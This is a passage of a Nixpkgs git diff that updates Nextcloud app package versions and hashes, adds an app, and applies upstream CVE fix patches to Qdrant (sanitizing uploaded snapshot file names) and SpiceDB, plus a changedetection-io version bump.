extension](https://chrome.google.com/webstore/detail/screensharing-for-nextclo/kepnpjhambipllfmgmbapncekcmabkol)).\n* 🚀 **Integration with other Nextcloud apps** like Files, Contacts and Deck. More to come.\n\nAnd in the works for the [coming versions](https://github.com/nextcloud/spreed/milestones/):\n* ✋ [Federated calls](https://github.com/nextcloud/spreed/issues/21), to call people on other Nextclouds", + "sha256": "0699c9xfmzk48q0f48lxw16h9l2300w6vp1sn2vb8wr76fbhm9kf", + "url": "https://github.com/nextcloud-releases/spreed/releases/download/v17.1.8/spreed-v17.1.8.tar.gz", + "version": "17.1.8", + "description": "Chat, video & audio-conferencing using WebRTC\n\n* 💬 **Chat** Nextcloud Talk comes with a simple text chat, allowing you to share or upload files from your Nextcloud Files app or local device and mention other participants.\n* 👥 **Private, group, public and password protected calls!** Invite someone, a whole group or send a public link to invite to a call.\n* 🌐 **Federated chats** Chat with other Nextcloud users on their servers\n* 💻 **Screen sharing!** Share your screen with the participants of your call.\n* 🚀 **Integration with other Nextcloud apps** like Files, Calendar, User status, Dashboard, Flow, Maps, Smart picker, Contacts, Deck, and many more.\n* 🌉 **Sync with other chat solutions** With [Matterbridge](https://github.com/42wim/matterbridge/) being integrated in Talk, you can easily sync a lot of other chat solutions to Nextcloud Talk and vice-versa.", "homepage": "https://github.com/nextcloud/spreed", "licenses": [ "agpl" @@ -309,6 +309,16 @@ "agpl" ] }, + "unroundedcorners": { + "sha256": "16h8zg7k18r01yx2a72bn22nmvbafrs3ksyy23fbrnirzgwcaaqf", + "url": "https://github.com/OliverParoczai/nextcloud-unroundedcorners/releases/download/v1.1.3/unroundedcorners-v1.1.3.tar.gz", + "version": "1.1.3", + "description": "# Unrounded Corners\nA Nextcloud app that restores the corners of buttons and widgets to their original looks by unrounding them.", + "homepage": "https://github.com/OliverParoczai/nextcloud-unroundedcorners", + "licenses": [ + "agpl" + ] + }, "unsplash": { "sha256": "1ya1h4nb9cyj1hdgb5l5isx7a43a7ri92cm0h8nwih20hi6a9wzx", "url": "https://github.com/nextcloud/unsplash/releases/download/v2.2.1/unsplash.tar.gz", diff --git a/pkgs/servers/nextcloud/packages/28.json b/pkgs/servers/nextcloud/packages/28.json index c851b2f892f0a..4a1a9f5e447d5 100644 --- a/pkgs/servers/nextcloud/packages/28.json +++ b/pkgs/servers/nextcloud/packages/28.json @@ -10,9 +10,9 @@ ] }, "calendar": { - "sha256": "18hlk6j3dzpcd61sgn8r8zmcc9d1bklq030kwyn4mzr20dcf75w5", - "url": "https://github.com/nextcloud-releases/calendar/releases/download/v4.6.7/calendar-v4.6.7.tar.gz", - "version": "4.6.7", + "sha256": "10sxr8xczq29a3c5a7n074hpx80a21m6v7a2xhz0yhv9q80yv5gz", + "url": "https://github.com/nextcloud-releases/calendar/releases/download/v4.7.0/calendar-v4.7.0.tar.gz", + "version": "4.7.0", "description": "The Calendar app is a user interface for Nextcloud's CalDAV server. Easily sync events from various devices with your Nextcloud and edit them online.\n\n* 🚀 **Integration with other Nextcloud apps!** Currently Contacts - more to come.\n* 🌐 **WebCal Support!** Want to see your favorite team’s matchdays in your calendar? No problem!\n* 🙋 **Attendees!** Invite people to your events\n* ⌚️ **Free/Busy!** See when your attendees are available to meet\n* ⏰ **Reminders!** Get alarms for events inside your browser and via email\n* 🔍 Search! Find your events at ease\n* ☑️ Tasks! See tasks with a due date directly in the calendar\n* 🙈 **We’re not reinventing the wheel!** Based on the great [c-dav library](https://github.com/nextcloud/cdav-library), [ical.js](https://github.com/mozilla-comm/ical.js) and [fullcalendar](https://github.com/fullcalendar/fullcalendar) libraries.", "homepage": "https://github.com/nextcloud/calendar/", "licenses": [ @@ -70,9 +70,9 @@ ] }, "forms": { - "sha256": "0iqkwnadhi6i1gnx7wiqny862g25kfiqi2mgkaf5cyiig3rispa0", - "url": "https://github.com/nextcloud-releases/forms/releases/download/v4.1.1/forms-v4.1.1.tar.gz", - "version": "4.1.1", + "sha256": "0ca627nyrs61k5990j3m1l7vxavsh8x8rrhfvk01pdl9f1556jmf", + "url": "https://github.com/nextcloud-releases/forms/releases/download/v4.2.3/forms-v4.2.3.tar.gz", + "version": "4.2.3", "description": "**Simple surveys and questionnaires, self-hosted!**\n\n- **📝 Simple design:** No mass of options, only the essentials. Works well on mobile of course.\n- **📊 View & export results:** Results are visualized and can also be exported as CSV in the same format used by Google Forms.\n- **🔒 Data under your control!** Unlike in Google Forms, Typeform, Doodle and others, the survey info and responses are kept private on your instance.\n- **🧑💻 Connect to your software:** Easily integrate Forms into your service with our full-fledged [REST-API](https://github.com/nextcloud/forms/blob/main/docs/API.md).\n- **🙋 Get involved!** We have lots of stuff planned like more question types, collaboration on forms, [and much more](https://github.com/nextcloud/forms/milestones)!", "homepage": "https://github.com/nextcloud/forms", "licenses": [ @@ -90,9 +90,9 @@ ] }, "groupfolders": { - "sha256": "0cg81d75dg96zp09jy4yzg65v14wf99c2snnj304v4dia410c8a3", - "url": "https://github.com/nextcloud-releases/groupfolders/releases/download/v16.0.5/groupfolders-v16.0.5.tar.gz", - "version": "16.0.5", + "sha256": "06lbv04byc08zqfws2hbxqdg05d25sfps80y21xahzcrv74z4ngl", + "url": "https://github.com/nextcloud-releases/groupfolders/releases/download/v16.0.6/groupfolders-v16.0.6.tar.gz", + "version": "16.0.6", "description": "Admin configured folders shared with everyone in a group.\n\nFolders can be configured from *Group folders* in the admin settings.\n\nAfter a folder is created, the admin can give access to the folder to one or more groups, control their write/sharing permissions and assign a quota for the folder.\n\nNote: Encrypting the contents of group folders is currently not supported.", "homepage": "https://github.com/nextcloud/groupfolders", "licenses": [ @@ -110,19 +110,19 @@ ] }, "integration_openai": { - "sha256": "0v8bpd74mvkc87jbqjkxcfhb728l0r85fsqjn1ahaj2g9xql07f6", - "url": "https://github.com/nextcloud-releases/integration_openai/releases/download/v1.2.1/integration_openai-v1.2.1.tar.gz", - "version": "1.2.1", - "description": "This app includes 3 custom smart pickers for Nextcloud:\n* ChatGPT-like answers\n* Image generation (with DALL·E 2 or LocalAI)\n* Whisper dictation\n\nIt also implements\n\n* A Translation provider (using any available language model)\n* A SpeechToText provider (using Whisper)\n\nInstead of connecting to the OpenAI API for these, you can also connect to a self-hosted [LocalAI](https://localai.io) instance.\n\n## Ethical AI Rating\n### Rating for Text generation using ChatGPT via OpenAI API: 🔴\n\nNegative:\n* the software for training and inference of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be run on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model's performance and CO2 usage.\n\n\n### Rating for Translation using ChatGPT via OpenAI API: 🔴\n\nNegative:\n* the software for training and inference of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be run on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model's performance and CO2 usage.\n\n### Rating for Image generation using DALL·E via OpenAI API: 🔴\n\nNegative:\n* the software for training and inferencing of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be ran on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n\n### Rating for Speech-To-Text using Whisper via OpenAI API: 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* The trained model is freely available, and thus can run on-premise\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n### Rating for Text generation via LocalAI: 🟢\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n* the training data is freely available, making it possible to check or correct for bias or optimise the performance and CO2 usage.\n\n\n### Rating for Image generation using Stable Diffusion via LocalAI : 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n\n### Rating for Speech-To-Text using Whisper via LocalAI: 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\nLearn more about the Nextcloud Ethical AI Rating [in our blog](https://nextcloud.com/blog/nextcloud-ethical-ai-rating/).", + "sha256": "1x9w13xljh8h8n7hic4ffxsk7y63x9yghr1450ng2p68y6vjsg4g", + "url": "https://github.com/nextcloud-releases/integration_openai/releases/download/v2.0.0/integration_openai-v2.0.0.tar.gz", + "version": "2.0.0", + "description": "⚠️ The smart pickers have been removed from this app\nas they are now included in the [Assistant app](https://apps.nextcloud.com/apps/assistant).\n\nThis app implements:\n\n* Text generation providers: Free prompt, Summarize, Headline and Reformulate (using any available large language model)\n* A Translation provider (using any available language model)\n* A SpeechToText provider (using Whisper)\n* An image generation provider\n\nInstead of connecting to the OpenAI API for these, you can also connect to a self-hosted [LocalAI](https://localai.io) instance\nor to any service that implements an API similar to the OpenAI one, for example: [Plusserver](https://www.plusserver.com/en/ai-platform/).\n\n## Ethical AI Rating\n### Rating for Text generation using ChatGPT via OpenAI API: 🔴\n\nNegative:\n* the software for training and inference of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be run on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model's performance and CO2 usage.\n\n\n### Rating for Translation using ChatGPT via OpenAI API: 🔴\n\nNegative:\n* the software for training and inference of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be run on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model's performance and CO2 usage.\n\n### Rating for Image generation using DALL·E via OpenAI API: 🔴\n\nNegative:\n* the software for training and inferencing of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be ran on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n\n### Rating for Speech-To-Text using Whisper via OpenAI API: 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* The trained model is freely available, and thus can run on-premise\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n### Rating for Text generation via LocalAI: 🟢\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n* the training data is freely available, making it possible to check or correct for bias or optimise the performance and CO2 usage.\n\n\n### Rating for Image generation using Stable Diffusion via LocalAI : 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n\n### Rating for Speech-To-Text using Whisper via LocalAI: 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\nLearn more about the Nextcloud Ethical AI Rating [in our blog](https://nextcloud.com/blog/nextcloud-ethical-ai-rating/).", "homepage": "https://github.com/nextcloud/integration_openai", "licenses": [ "agpl" ] }, "mail": { - "sha256": "122qyz6d9771ivpl771g5wi3lxsd2g3v64n9cp5clm8p662msjfi", - "url": "https://github.com/nextcloud-releases/mail/releases/download/v3.5.7/mail-v3.5.7.tar.gz", - "version": "3.5.7", + "sha256": "1m48zdh7jjmgw7r9y9irp7z22wjippjswy7r60yvsdxbac765n14", + "url": "https://github.com/nextcloud-releases/mail/releases/download/v3.6.0/mail-v3.6.0.tar.gz", + "version": "3.6.0", "description": "**💌 A mail app for Nextcloud**\n\n- **🚀 Integration with other Nextcloud apps!** Currently Contacts, Calendar & Files – more to come.\n- **📥 Multiple mail accounts!** Personal and company account? No problem, and a nice unified inbox. Connect any IMAP account.\n- **🔒 Send & receive encrypted mails!** Using the great [Mailvelope](https://mailvelope.com) browser extension.\n- **🙈 We’re not reinventing the wheel!** Based on the great [Horde](https://horde.org) libraries.\n- **📬 Want to host your own mail server?** We do not have to reimplement this as you could set up [Mail-in-a-Box](https://mailinabox.email)!\n\n## Ethical AI Rating\n\n### Priority Inbox\n\nPositive:\n* The software for training and inferencing of this model is open source.\n* The model is created and trained on-premises based on the user's own data.\n* The training data is accessible to the user, making it possible to check or correct for bias or optimise the performance and CO2 usage.\n\n### Thread Summaries (opt-in)\n\n**Rating:** 🟢/🟡/🟠/🔴\n\nThe rating depends on the installed text processing backend. See [the rating overview](https://docs.nextcloud.com/server/latest/admin_manual/ai/index.html) for details.\n\nLearn more about the Nextcloud Ethical AI Rating [in our blog](https://nextcloud.com/blog/nextcloud-ethical-ai-rating/).", "homepage": "https://github.com/nextcloud/mail#readme", "licenses": [ @@ -130,9 +130,9 @@ ] }, "maps": { - "sha256": "0rs5cqn2saip7fmj71ww879iqsmmigf0fi6fdbqmdxmrmvsnl9l6", - "url": "https://github.com/nextcloud/maps/releases/download/v1.3.1/maps-1.3.1.tar.gz", - "version": "1.3.1", + "sha256": "18gln06hgljgnr90ki95nl7b8986ivf3cymr6hajilszlr77hk22", + "url": "https://github.com/nextcloud/maps/releases/download/v1.4.0-1-nightly/maps-1.4.0-1-nightly.tar.gz", + "version": "1.4.0", "description": "**The whole world fits inside your cloud!**\n\n- **🗺 Beautiful map:** Using [OpenStreetMap](https://www.openstreetmap.org) and [Leaflet](https://leafletjs.com), you can choose between standard map, satellite, topographical, dark mode or even watercolor! 🎨\n- **⭐ Favorites:** Save your favorite places, privately! Sync with [GNOME Maps](https://github.com/nextcloud/maps/issues/30) and mobile apps is planned.\n- **🧭 Routing:** Possible using either [OSRM](http://project-osrm.org), [GraphHopper](https://www.graphhopper.com) or [Mapbox](https://www.mapbox.com).\n- **🖼 Photos on the map:** No more boring slideshows, just show directly where you were!\n- **🙋 Contacts on the map:** See where your friends live and plan your next visit.\n- **📱 Devices:** Lost your phone? Check the map!\n- **〰 Tracks:** Load GPS tracks or past trips. Recording with [PhoneTrack](https://f-droid.org/en/packages/net.eneiluj.nextcloud.phonetrack/) or [OwnTracks](https://owntracks.org) is planned.", "homepage": "https://github.com/nextcloud/maps", "licenses": [ @@ -140,9 +140,9 @@ ] }, "memories": { - "sha256": "0638120x6byp35gslcr2yg4rswihjjdssnjw87fxx7q41sd02vsz", - "url": "https://github.com/pulsejet/memories/releases/download/v7.0.2/memories.tar.gz", - "version": "7.0.2", + "sha256": "02l9rq117x7x4nra1f50fkn7yr3cpbjnsq9nlr7rnsn9qsf5rrw9", + "url": "https://github.com/pulsejet/memories/releases/download/v7.2.0/memories.tar.gz", + "version": "7.2.0", "description": "# Memories: Photo Management for Nextcloud\n\nMemories is a *batteries-included* photo management solution for Nextcloud with advanced features including:\n\n- **📸 Timeline**: Sort photos and videos by date taken, parsed from Exif data.\n- **⏪ Rewind**: Jump to any time in the past instantly and relive your memories.\n- **🤖 AI Tagging**: Group photos by people and objects, powered by [recognize](https://github.com/nextcloud/recognize) and [facerecognition](https://github.com/matiasdelellis/facerecognition).\n- **🖼️ Albums**: Create albums to group photos and videos together. Then share these albums with others.\n- **🫱🏻🫲🏻 External Sharing**: Share photos and videos with people outside of your Nextcloud instance.\n- **📱 Mobile Support**: Work from any device, of any shape and size through the web app.\n- **✏️ Edit Metadata**: Edit dates and other metadata on photos quickly and in bulk.\n- **📦 Archive**: Store photos you don't want to see in your timeline in a separate folder.\n- **📹 Video Transcoding**: Transcode videos and use HLS for maximal performance.\n- **🗺️ Map**: View your photos on a map, tagged with accurate reverse geocoding.\n- **📦 Migration**: Migrate easily from Nextcloud Photos and Google Takeout.\n- **⚡️ Performance**: Do all this very fast.\n\n## 🚀 Installation\n\n1. Install the app from the Nextcloud app store (try a demo [here](https://demo.memories.gallery/apps/memories/)).\n1. Perform the recommended [configuration steps](https://memories.gallery/config/).\n1. Run `php occ memories:index` to generate metadata indices for existing photos.\n1. Open the 📷 Memories app in Nextcloud and set the directory containing your photos.", "homepage": "https://memories.gallery", "licenses": [ @@ -150,9 +150,9 @@ ] }, "music": { - "sha256": "1afjqvmcim1r22bs5vpp2b2wd01df5xdchw6ifqf57vgb7nzzkbs", - "url": "https://github.com/owncloud/music/releases/download/v1.10.0/music_1.10.0_for_nextcloud.tar.gz", - "version": "1.10.0", + "sha256": "04dh6vzriiiqnn02pjbwn9rv0q427njbx558jl504jp91b8qd2wn", + "url": "https://github.com/owncloud/music/releases/download/v1.11.0/music_1.11.0_for_nextcloud.tar.gz", + "version": "1.11.0", "description": "A stand-alone music player app and a \"lite\" player for the Files app\n\n- On modern browsers, supports audio types .mp3, .ogg, .m4a, .m4b, .flac, .wav, and more\n- Playlist support with import from m3u, m3u8, and pls files\n- Browse by artists, albums, genres, or folders\n- Gapless play\n- Filter the shown content with the search function\n- Play internet radio and podcast channels\n- Setup Last.fm connection to see background information on artists, albums, and songs\n- Control with media control keys on the keyboard or OS\n- The app can handle libraries consisting of thousands of albums and tens of thousands of songs\n- Includes a server backend compatible with the Subsonic and Ampache protocols, allowing playback and browsing of your library on various external apps e.g. on Android or iPhone", "homepage": "https://github.com/owncloud/music", "licenses": [ @@ -160,9 +160,9 @@ ] }, "notes": { - "sha256": "1ii3ii2062wklss3mxsfbvqi4hvi96a20i20lbwm6z2x6q7fqqi3", - "url": "https://github.com/nextcloud-releases/notes/releases/download/v4.9.4/notes-v4.9.4.tar.gz", - "version": "4.9.4", + "sha256": "0j9bwbfvwwdaabyc79i514sp36cm4i9z02l8bkxlqr9fvim73nn9", + "url": "https://github.com/nextcloud-releases/notes/releases/download/v4.10.0/notes.tar.gz", + "version": "4.10.0", "description": "The Notes app is a distraction free notes taking app for [Nextcloud](https://www.nextcloud.com/). It provides categories for better organization and supports formatting using [Markdown](https://en.wikipedia.org/wiki/Markdown) syntax. Notes are saved as files in your Nextcloud, so you can view and edit them with every Nextcloud client. Furthermore, a separate [REST API](https://github.com/nextcloud/notes/blob/master/docs/api/README.md) allows for an easy integration into third-party apps (currently, there are notes apps for [Android](https://github.com/nextcloud/notes-android), [iOS](https://github.com/nextcloud/notes-ios) and the [console](https://git.danielmoch.com/nncli/about) which allow convenient access to your Nextcloud notes). Further features include marking notes as favorites.", "homepage": "https://github.com/nextcloud/notes", "licenses": [ @@ -180,9 +180,9 @@ ] }, "onlyoffice": { - "sha256": "14vqyr7yq95kiwkb2q25qa5kxfx0mri12bbyy2fpm94kk2y2km37", - "url": "https://github.com/ONLYOFFICE/onlyoffice-nextcloud/releases/download/v9.0.0/onlyoffice.tar.gz", - "version": "9.0.0", + "sha256": "1hg6cs8rbvy00w541pd1qcr5l6xqnjz816pm2jyxqxm8dm5kag7a", + "url": "https://github.com/ONLYOFFICE/onlyoffice-nextcloud/releases/download/v9.1.2/onlyoffice.tar.gz", + "version": "9.1.2", "description": "ONLYOFFICE connector allows you to view, edit and collaborate on text documents, spreadsheets and presentations within Nextcloud using ONLYOFFICE Docs. This will create a new Edit in ONLYOFFICE action within the document library for Office documents. This allows multiple users to co-author documents in real time from the familiar web interface and save the changes back to your file storage.", "homepage": "https://www.onlyoffice.com", "licenses": [ @@ -200,9 +200,9 @@ ] }, "polls": { - "sha256": "0gym2sx9lx6nvyby9pj1xml4n9fa7q91rl1i33kb70fclv622ca3", - "url": "https://github.com/nextcloud/polls/releases/download/v7.0.0/polls.tar.gz", - "version": "7.0.0", + "sha256": "1crs6fks9ywywyi3pnji49dxnry5vpcmd1x29y8anyp32ji2a35r", + "url": "https://github.com/nextcloud/polls/releases/download/v7.0.3/polls.tar.gz", + "version": "7.0.3", "description": "A polls app, similar to Doodle/Dudle with the possibility to restrict access (members, certain groups/users, hidden and public).", "homepage": "https://github.com/nextcloud/polls", "licenses": [ @@ -210,9 +210,9 @@ ] }, "previewgenerator": { - "sha256": "08f0ivxqa2b54w2q4lycb3p5ngqyk92n2qll54pmpj54pfn1sj3m", - "url": "https://github.com/nextcloud-releases/previewgenerator/releases/download/v5.4.0/previewgenerator-v5.4.0.tar.gz", - "version": "5.4.0", + "sha256": "0505kg4pxa6dqylniwa5ip6h5bama8cp0ng2y7prhb93mnhgr051", + "url": "https://github.com/nextcloud-releases/previewgenerator/releases/download/v5.5.0/previewgenerator-v5.5.0.tar.gz", + "version": "5.5.0", "description": "The Preview Generator app allows admins to pre-generate previews. The app listens to edit events and stores this information. Once a cron job is triggered it will generate start preview generation. This means that you can better utilize your system by pre-generating previews when your system is normally idle and thus putting less load on your machine when the requests are actually served.\n\nThe app does not replace on demand preview generation so if a preview is requested before it is pre-generated it will still be shown.\nThe first time you install this app, before using a cron job, you properly want to generate all previews via:\n**./occ preview:generate-all -vvv**\n\n**Important**: To enable pre-generation of previews you must add **php /var/www/nextcloud/occ preview:pre-generate** to a system cron job that runs at times of your choosing.", "homepage": "https://github.com/nextcloud/previewgenerator", "licenses": [ @@ -220,9 +220,9 @@ ] }, "qownnotesapi": { - "sha256": "1pyr4b3w6gsy83ci6cy0wfv870qm2v957nl4w6xk989iyknk4ana", - "url": "https://github.com/pbek/qownnotesapi/releases/download/v23.12.0/qownnotesapi-nc.tar.gz", - "version": "23.12.0", + "sha256": "0y4cv4hagmax4nkdfzysd5fg2h2xak4m87waf3b0ci5f1bwdxdxx", + "url": "https://github.com/pbek/qownnotesapi/releases/download/v24.4.0/qownnotesapi-nc.tar.gz", + "version": "24.4.0", "description": "QOwnNotesAPI is the Nextcloud/ownCloud API for [QOwnNotes](http://www.qownnotes.org), the open source notepad for Linux, macOS and Windows, that works together with the notes application of Nextcloud/ownCloud.\n\nThe only purpose of this App is to provide API access to your Nextcloud/ownCloud server for your QOwnNotes desktop installation, you cannot use this App for anything else, if you don't have QOwnNotes installed on your desktop computer!", "homepage": "https://github.com/pbek/qownnotesapi", "licenses": [ @@ -240,10 +240,10 @@ ] }, "spreed": { - "sha256": "1irkfcyv07ij564aigsrrg1glw78v9lm09126qwmbs6fbz1acxl2", - "url": "https://github.com/nextcloud-releases/spreed/releases/download/v18.0.5/spreed-v18.0.5.tar.gz", - "version": "18.0.5", - "description": "Chat, video & audio-conferencing using WebRTC\n\n* 💬 **Chat integration!** Nextcloud Talk comes with a simple text chat. Allowing you to share files from your Nextcloud and mentioning other participants.\n* 👥 **Private, group, public and password protected calls!** Just invite somebody, a whole group or send a public link to invite to a call.\n* 💻 **Screen sharing!** Share your screen with participants of your call. You just need to use Firefox version 66 (or newer), latest Edge or Chrome 72 (or newer, also possible using Chrome 49 with this [Chrome extension](https://chrome.google.com/webstore/detail/screensharing-for-nextclo/kepnpjhambipllfmgmbapncekcmabkol)).\n* 🚀 **Integration with other Nextcloud apps** like Files, Contacts and Deck. More to come.\n\nAnd in the works for the [coming versions](https://github.com/nextcloud/spreed/milestones/):\n* ✋ [Federated calls](https://github.com/nextcloud/spreed/issues/21), to call people on other Nextclouds", + "sha256": "1d6y473xnlc2n3k9hqb2n2zk780pran77k4frbgfyikinbadd1ci", + "url": "https://github.com/nextcloud-releases/spreed/releases/download/v18.0.7/spreed-v18.0.7.tar.gz", + "version": "18.0.7", + "description": "Chat, video & audio-conferencing using WebRTC\n\n* 💬 **Chat** Nextcloud Talk comes with a simple text chat, allowing you to share or upload files from your Nextcloud Files app or local device and mention other participants.\n* 👥 **Private, group, public and password protected calls!** Invite someone, a whole group or send a public link to invite to a call.\n* 🌐 **Federated chats** Chat with other Nextcloud users on their servers\n* 💻 **Screen sharing!** Share your screen with the participants of your call.\n* 🚀 **Integration with other Nextcloud apps** like Files, Calendar, User status, Dashboard, Flow, Maps, Smart picker, Contacts, Deck, and many more.\n* 🌉 **Sync with other chat solutions** With [Matterbridge](https://github.com/42wim/matterbridge/) being integrated in Talk, you can easily sync a lot of other chat solutions to Nextcloud Talk and vice-versa.", "homepage": "https://github.com/nextcloud/spreed", "licenses": [ "agpl" @@ -279,6 +279,16 @@ "agpl" ] }, + "unroundedcorners": { + "sha256": "16h8zg7k18r01yx2a72bn22nmvbafrs3ksyy23fbrnirzgwcaaqf", + "url": "https://github.com/OliverParoczai/nextcloud-unroundedcorners/releases/download/v1.1.3/unroundedcorners-v1.1.3.tar.gz", + "version": "1.1.3", + "description": "# Unrounded Corners\nA Nextcloud app that restores the corners of buttons and widgets to their original looks by unrounding them.", + "homepage": "https://github.com/OliverParoczai/nextcloud-unroundedcorners", + "licenses": [ + "agpl" + ] + }, "user_oidc": { "sha256": "0nl716c8jx6hhpkxjdpbldlnqhh6jsm6xx1zmcmvkzkdr9pjkggj", "url": "https://github.com/nextcloud-releases/user_oidc/releases/download/v5.0.2/user_oidc-v5.0.2.tar.gz", @@ -290,9 +300,9 @@ ] }, "user_saml": { - "sha256": "112nmngl99vfiqx39zbz6n8ajaifr02y5p0kcd5iz60qnf8za3kk", - "url": "https://github.com/nextcloud-releases/user_saml/releases/download/v6.1.2/user_saml-v6.1.2.tar.gz", - "version": "6.1.2", + "sha256": "1dw5mwzzlhfwarnnpsij3l6153psl83qkjmgm0bnipy4v8wkkqvj", + "url": "https://github.com/nextcloud-releases/user_saml/releases/download/v6.1.3/user_saml-v6.1.3.tar.gz", + "version": "6.1.3", "description": "Using the SSO & SAML app of your Nextcloud you can make it easily possible to integrate your existing Single-Sign-On solution with Nextcloud. In addition, you can use the Nextcloud LDAP user provider to keep the convenience for users. (e.g. when sharing)\nThe following providers are supported and tested at the moment:\n\n* **SAML 2.0**\n\t* OneLogin\n\t* Shibboleth\n\t* Active Directory Federation Services (ADFS)\n\n* **Authentication via Environment Variable**\n\t* Kerberos (mod_auth_kerb)\n\t* Any other provider that authenticates using the environment variable\n\nWhile theoretically any other authentication provider implementing either one of those standards is compatible, we like to note that they are not part of any internal test matrix.", "homepage": "https://github.com/nextcloud/user_saml", "licenses": [ diff --git a/pkgs/servers/nextcloud/packages/nextcloud-apps.json b/pkgs/servers/nextcloud/packages/nextcloud-apps.json index 825063b6fad3f..b7a48a0baca77 100644 --- a/pkgs/servers/nextcloud/packages/nextcloud-apps.json +++ b/pkgs/servers/nextcloud/packages/nextcloud-apps.json @@ -31,6 +31,7 @@ , "twofactor_nextcloud_notification": "agpl3Only" , "twofactor_totp": "agpl3Plus" , "twofactor_webauthn": "agpl3Plus" +, "unroundedcorners": "agpl3Only" , "unsplash": "agpl3Only" , "user_oidc": "agpl3Plus" , "user_saml": "agpl3Plus" diff --git a/pkgs/servers/search/qdrant/1.6.1-CVE-2024-2221.patch b/pkgs/servers/search/qdrant/1.6.1-CVE-2024-2221.patch new file mode 100644 index 0000000000000..4ae822e305022 --- /dev/null +++ b/pkgs/servers/search/qdrant/1.6.1-CVE-2024-2221.patch @@ -0,0 +1,23 @@ +Based on upstream 3ab8ec7d14178bb2ac39a4bcc972f2258254196e with unnecessary +conflicting hunk dropped + +diff --git a/src/actix/api/snapshot_api.rs b/src/actix/api/snapshot_api.rs +index b8b40c6b..0fbed314 100644 +--- a/src/actix/api/snapshot_api.rs ++++ b/src/actix/api/snapshot_api.rs +@@ -75,6 +75,15 @@ pub async fn do_save_uploaded_snapshot( + ) -> std::result::Result<Url, StorageError> { + let filename = snapshot + .file_name ++ // Sanitize the file name: ++ // - only take the top level path (no directories such as ../) ++ // - require the file name to be valid UTF-8 ++ .and_then(|x| { ++ Path::new(&x) ++ .file_name() ++ .map(|filename| filename.to_owned()) ++ }) ++ .and_then(|x| x.to_str().map(|x| x.to_owned())) + .unwrap_or_else(|| Uuid::new_v4().to_string()); + let collection_snapshot_path = toc.snapshots_path_for_collection(collection_name); + if !collection_snapshot_path.exists() { diff --git a/pkgs/servers/search/qdrant/default.nix b/pkgs/servers/search/qdrant/default.nix index 3dd3b6227b684..bc628df4043b8 100644 --- a/pkgs/servers/search/qdrant/default.nix +++ b/pkgs/servers/search/qdrant/default.nix @@ -23,6 +23,7 @@ rustPlatform.buildRustPackage rec { patches = [ ./1.6.1-CVE-2024-3078.patch + ./1.6.1-CVE-2024-2221.patch ]; cargoLock = { diff --git a/pkgs/servers/spicedb/default.nix b/pkgs/servers/spicedb/default.nix index 3ad129be17d63..cc595eca2f742 100644 --- a/pkgs/servers/spicedb/default.nix +++ b/pkgs/servers/spicedb/default.nix @@ -27,6 +27,11 @@ buildGoModule rec { url = "https://github.com/authzed/spicedb/commit/ef443c442b96909694390324a99849b0407007fe.patch"; hash = "sha256-8xXM0EBxJ0hI7RtURFxmRpYqGdSGZ/jZVP4KAuh2E/U="; }) + (fetchpatch { + name = "CVE-2024-32001.patch"; + url = "https://github.com/authzed/spicedb/commit/a244ed1edfaf2382711dccdb699971ec97190c7b.patch"; + hash = "sha256-tdSqo7tFXs/ea5dIKV9Aikva9Za0Hj1Ng4LeCAQX9DA="; + }) ]; vendorHash = "sha256-r0crxfE3XtsT4+5lWNY6R/bcuxq2WeongK9l7ABXQo8="; diff --git a/pkgs/servers/web-apps/changedetection-io/default.nix b/pkgs/servers/web-apps/changedetection-io/default.nix index a162448e637e9..c5bac2fa3d903 100644 --- a/pkgs/servers/web-apps/changedetection-io/default.nix +++ b/pkgs/servers/web-apps/changedetection-io/default.nix @@ -5,19 +5,19 @@ python3.pkgs.buildPythonApplication rec { pname = "changedetection-io"; - version = "0.45.9"; + version = "0.45.21"; format = "setuptools"; src = fetchFromGitHub { owner = "dgtlmoon"; repo = "changedetection.io"; - rev = version; - hash = "sha256-xiKXp9DBaiSteqZwQLZ4zLwT5MeETJx01rKRrWGYioc="; + rev = "refs/tags/${version}"; + hash = "sha256-v+bjGIwJlHcim29BRR+5kZABnmtLYSS/U3pbPnCvAhU="; }; postPatch = '' substituteInPlace requirements.txt \ - --replace "apprise~=1.6.0" "apprise" \ + --replace "apprise~=1.7.4" "apprise" \ --replace "cryptography~=3.4" "cryptography" \ --replace "dnspython~=2.4" "dnspython" 